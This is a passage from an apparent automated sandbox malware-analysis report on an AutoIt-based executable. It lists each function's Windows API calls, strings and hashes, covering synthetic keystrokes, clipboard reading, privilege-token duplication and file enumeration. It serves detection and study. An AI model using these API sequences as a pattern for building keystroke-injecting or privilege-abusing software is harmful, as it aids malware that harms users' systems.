                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                          • String ID: %d/%02d/%02d
                                                                                                                                                          • API String ID: 3850602802-328681919
                                                                                                                                                          • Opcode ID: 8f6aa21c39a63702fd0ba200ac4c4d75859eb575b921f5e3cff6318a5960f30b
                                                                                                                                                          • Instruction ID: 02bcfcb6eae4b39c1a71dfa0a43f1d8076f41d3682c9b14f2f07c12145c8e3a7
                                                                                                                                                          • Opcode Fuzzy Hash: 8f6aa21c39a63702fd0ba200ac4c4d75859eb575b921f5e3cff6318a5960f30b
                                                                                                                                                          • Instruction Fuzzy Hash: E512E1B1500204ABEB29AF64DC49FAE7BF8EF45710F50421AF61ADB6E1DB708A41CF51
                                                                                                                                                          Function 0013F78E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetForegroundWindow.USER32(00000000,00000000), ref: 0013F796
                                                                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00194388
                                                                                                                                                          • IsIconic.USER32(000000FF), ref: 00194391
                                                                                                                                                          • ShowWindow.USER32(000000FF,00000009), ref: 0019439E
                                                                                                                                                          • SetForegroundWindow.USER32(000000FF), ref: 001943A8
                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 001943BE
                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 001943C5
                                                                                                                                                          • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 001943D1
                                                                                                                                                          • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 001943E2
                                                                                                                                                          • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 001943EA
                                                                                                                                                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 001943F2
                                                                                                                                                          • SetForegroundWindow.USER32(000000FF), ref: 001943F5
                                                                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0019440A
                                                                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 00194415
                                                                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0019441F
                                                                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 00194424
                                                                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0019442D
                                                                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 00194432
                                                                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0019443C
                                                                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 00194441
                                                                                                                                                          • SetForegroundWindow.USER32(000000FF), ref: 00194444
                                                                                                                                                          • AttachThreadInput.USER32(000000FF,?,00000000), ref: 0019446B
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                          • String ID: Shell_TrayWnd
                                                                                                                                                          • API String ID: 4125248594-2988720461
                                                                                                                                                          • Opcode ID: edeee3ccc8b7586d247f15433596f3c64c6124e8ad88cc1f999e5d1f960c75fc
                                                                                                                                                          • Instruction ID: 068ddddace9013fff86a23e309706038a36a1e2618fda9ec7e91d0be986ce83b
                                                                                                                                                          • Opcode Fuzzy Hash: edeee3ccc8b7586d247f15433596f3c64c6124e8ad88cc1f999e5d1f960c75fc
                                                                                                                                                          • Instruction Fuzzy Hash: E4319271A40318BBEF206BB1AC49FBF3E6CEB45B54F114025FA06EA5D1D7B05D41AEA0
                                                                                                                                                          Function 0012BDF0 Relevance: 35.6, APIs: 12, Strings: 8, Instructions: 643COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0012CAEE: _memmove.LIBCMT ref: 0012CB2F
                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,001E22E8,?,00000000,?,00123E2E,?,00000000,?,001BDBF0,00000000,?), ref: 0012BE8B
                                                                                                                                                          • GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00123E2E,?,00000000,?,001BDBF0,00000000,?,00000002), ref: 0012BEA7
                                                                                                                                                          • __wsplitpath.LIBCMT ref: 0012BF19
                                                                                                                                                            • Part of subcall function 0014297D: __wsplitpath_helper.LIBCMT ref: 001429BD
                                                                                                                                                          • _wcscpy.LIBCMT ref: 0012BF31
                                                                                                                                                          • _wcscat.LIBCMT ref: 0012BF46
                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0012BF56
                                                                                                                                                          • _wcscpy.LIBCMT ref: 0012C03E
                                                                                                                                                          • _wcscpy.LIBCMT ref: 0012C1ED
                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32 ref: 0012C250
                                                                                                                                                            • Part of subcall function 0014010A: std::exception::exception.LIBCMT ref: 0014013E
                                                                                                                                                            • Part of subcall function 0014010A: __CxxThrowException@8.LIBCMT ref: 00140153
                                                                                                                                                            • Part of subcall function 0012C320: _memmove.LIBCMT ref: 0012C419
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentDirectory_wcscpy$_memmove$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_wcscatstd::exception::exception
                                                                                                                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string$_
                                                                                                                                                          • API String ID: 2542276039-689609797
                                                                                                                                                          • Opcode ID: 3157f9cf321c6dd3dce5622fed96bfad8f3b20c9fe2357b2558d4f57c9325a9e
                                                                                                                                                          • Instruction ID: 3137e13da7f9880582f2456dfac7f11b49210e520bd18e48584dea2e9509b554
                                                                                                                                                          • Opcode Fuzzy Hash: 3157f9cf321c6dd3dce5622fed96bfad8f3b20c9fe2357b2558d4f57c9325a9e
                                                                                                                                                          • Instruction Fuzzy Hash: E842AE715083519FDB11EF60D881BAFB7E8AFA4300F00492DF59687252EB31EA59CB93
                                                                                                                                                          Function 00177099 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • OpenClipboard.USER32(001BDBF0), ref: 001770C3
                                                                                                                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 001770D1
                                                                                                                                                          • GetClipboardData.USER32(0000000D), ref: 001770D9
                                                                                                                                                          • CloseClipboard.USER32 ref: 001770E5
                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00177101
                                                                                                                                                          • CloseClipboard.USER32 ref: 0017710B
                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00177120
                                                                                                                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 0017712D
                                                                                                                                                          • GetClipboardData.USER32(00000001), ref: 00177135
                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00177142
                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00177176
                                                                                                                                                          • CloseClipboard.USER32 ref: 00177283
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3222323430-0
                                                                                                                                                          • Opcode ID: 87ab3e8190ff71aae7f7b5ed78522c8830efcd5ccc6d2eb709965712f2409636
                                                                                                                                                          • Instruction ID: 9e5beb73e4e054e50f408c28677b126c5015e1425bdbf142f569ef4c4b9f7d91
                                                                                                                                                          • Opcode Fuzzy Hash: 87ab3e8190ff71aae7f7b5ed78522c8830efcd5ccc6d2eb709965712f2409636
                                                                                                                                                          • Instruction Fuzzy Hash: AD51BF31208601ABD305FF60EC8AF7E77B8AF99B01F008519F55AD65E2EB70D944CB62
                                                                                                                                                          Function 0015B9F1 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 223COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0015BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0015BF0F
                                                                                                                                                            • Part of subcall function 0015BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0015BF3C
                                                                                                                                                            • Part of subcall function 0015BEC3: GetLastError.KERNEL32 ref: 0015BF49
                                                                                                                                                          • _memset.LIBCMT ref: 0015BA34
                                                                                                                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0015BA86
                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0015BA97
                                                                                                                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0015BAAE
                                                                                                                                                          • GetProcessWindowStation.USER32 ref: 0015BAC7
                                                                                                                                                          • SetProcessWindowStation.USER32(00000000), ref: 0015BAD1
                                                                                                                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0015BAEB
                                                                                                                                                            • Part of subcall function 0015B8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000), ref: 0015B8C5
                                                                                                                                                            • Part of subcall function 0015B8B0: CloseHandle.KERNEL32(?), ref: 0015B8D7
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                                                          • String ID: $default$winsta0
                                                                                                                                                          • API String ID: 2063423040-1027155976
                                                                                                                                                          • Opcode ID: c8c355925d239d576c0e1d7fbe18273d2b6181800dc3adc7ba4b4061c7f3a9c4
                                                                                                                                                          • Instruction ID: f2d16dc190fdcd7a3c10bd29ba4f49e5a1d22f2438c043a4c5624d4e5c5d63da
                                                                                                                                                          • Opcode Fuzzy Hash: c8c355925d239d576c0e1d7fbe18273d2b6181800dc3adc7ba4b4061c7f3a9c4
                                                                                                                                                          • Instruction Fuzzy Hash: 6D8179B1804209EFDF119FA4DD85AEEBBB8EF09305F144119FD25AA161DB318E59DB20
                                                                                                                                                          Function 0016FDD2 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0016FE03
                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0016FE57
                                                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0016FE7C
                                                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0016FE93
                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0016FEBA
                                                                                                                                                          • __swprintf.LIBCMT ref: 0016FF06
                                                                                                                                                          • __swprintf.LIBCMT ref: 0016FF3F
                                                                                                                                                            • Part of subcall function 0012CAEE: _memmove.LIBCMT ref: 0012CB2F
                                                                                                                                                          • __swprintf.LIBCMT ref: 0016FF93
                                                                                                                                                            • Part of subcall function 0014234B: __woutput_l.LIBCMT ref: 001423A4
                                                                                                                                                          • __swprintf.LIBCMT ref: 0016FFE1
                                                                                                                                                          • __swprintf.LIBCMT ref: 00170030
                                                                                                                                                          • __swprintf.LIBCMT ref: 0017007F
                                                                                                                                                          • __swprintf.LIBCMT ref: 001700CE
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l_memmove
                                                                                                                                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                                                          • API String ID: 108614129-2428617273
                                                                                                                                                          • Opcode ID: f8c145b2c51c654825af258ca1639bec4d826c3f37066a9e970e155e075dcb5c
                                                                                                                                                          • Instruction ID: abdbe0273f5715987dff508758b1b9b6b862340cd6be3804160b114d61bc1c05
                                                                                                                                                          • Opcode Fuzzy Hash: f8c145b2c51c654825af258ca1639bec4d826c3f37066a9e970e155e075dcb5c
                                                                                                                                                          • Instruction Fuzzy Hash: BEA11D72408354ABC304EBA4DC85DAFB7EDBFA8700F44092DF595C2151EB34EA59CBA2
                                                                                                                                                          Function 00172044 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00172065
                                                                                                                                                          • _wcscmp.LIBCMT ref: 0017207A
                                                                                                                                                          • _wcscmp.LIBCMT ref: 00172091
                                                                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 001720A3
                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 001720D5
                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 001720E0
                                                                                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 001720FC
                                                                                                                                                          • _wcscmp.LIBCMT ref: 00172123
                                                                                                                                                          • _wcscmp.LIBCMT ref: 0017213A
                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0017214C
                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(001D3A68), ref: 0017216A
                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00172174
                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00172181
                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00172191
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Attributes
                                                                                                                                                          • String ID: *.*
                                                                                                                                                          • API String ID: 70642500-438819550
                                                                                                                                                          • Opcode ID: 598f1a599b1b5f6bbc8c9a996d74c20af4aaacf43d8ff87042437b221fef5671
                                                                                                                                                          • Instruction ID: 25e6b7e31d0f32edef26ed8f314de63fa7a89b2c6af4f300dfca4ba2d9b590d5
                                                                                                                                                          • Opcode Fuzzy Hash: 598f1a599b1b5f6bbc8c9a996d74c20af4aaacf43d8ff87042437b221fef5671
                                                                                                                                                          • Instruction Fuzzy Hash: F831C4716006197ACF24DBB4EC48EDE73BCAF4A320F508056F915E3590DB74DA85CB61
                                                                                                                                                          Function 0018F122 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfilenativeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0013AF8E
                                                                                                                                                          • DragQueryPoint.SHELL32(?,?), ref: 0018F14B
                                                                                                                                                            • Part of subcall function 0018D5EE: ClientToScreen.USER32(?,?), ref: 0018D617
                                                                                                                                                            • Part of subcall function 0018D5EE: GetWindowRect.USER32(?,?), ref: 0018D68D
                                                                                                                                                            • Part of subcall function 0018D5EE: PtInRect.USER32(?,?,0018EB2C), ref: 0018D69D
                                                                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0018F1B4
                                                                                                                                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0018F1BF
                                                                                                                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0018F1E2
                                                                                                                                                          • _wcscat.LIBCMT ref: 0018F212
                                                                                                                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0018F229
                                                                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0018F242
                                                                                                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0018F259
                                                                                                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0018F27B
                                                                                                                                                          • DragFinish.SHELL32(?), ref: 0018F282
                                                                                                                                                          • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 0018F36D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                                                                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                          • API String ID: 2166380349-3440237614
                                                                                                                                                          • Opcode ID: af9f7c5f7110089b081fb4eb042642772301d56454e089dbca7a97b18d676059
                                                                                                                                                          • Instruction ID: ab7ff48ed50b47e1e7e754b3cbc466ff3668e5a26c8b13a92b3389f98f42ff16
                                                                                                                                                          • Opcode Fuzzy Hash: af9f7c5f7110089b081fb4eb042642772301d56454e089dbca7a97b18d676059
                                                                                                                                                          • Instruction Fuzzy Hash: 65614972108700AFC700EF64EC85D9FBBF9BF99710F000A2EF695921A1DB709A45CB62
                                                                                                                                                          Function 0017219F Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 001721C0
                                                                                                                                                          • _wcscmp.LIBCMT ref: 001721D5
                                                                                                                                                          • _wcscmp.LIBCMT ref: 001721EC
                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0017221B
                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00172226
                                                                                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00172242
                                                                                                                                                          • _wcscmp.LIBCMT ref: 00172269
                                                                                                                                                          • _wcscmp.LIBCMT ref: 00172280
                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00172292
                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(001D3A68), ref: 001722B0
                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 001722BA
                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 001722C7
                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 001722D7
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
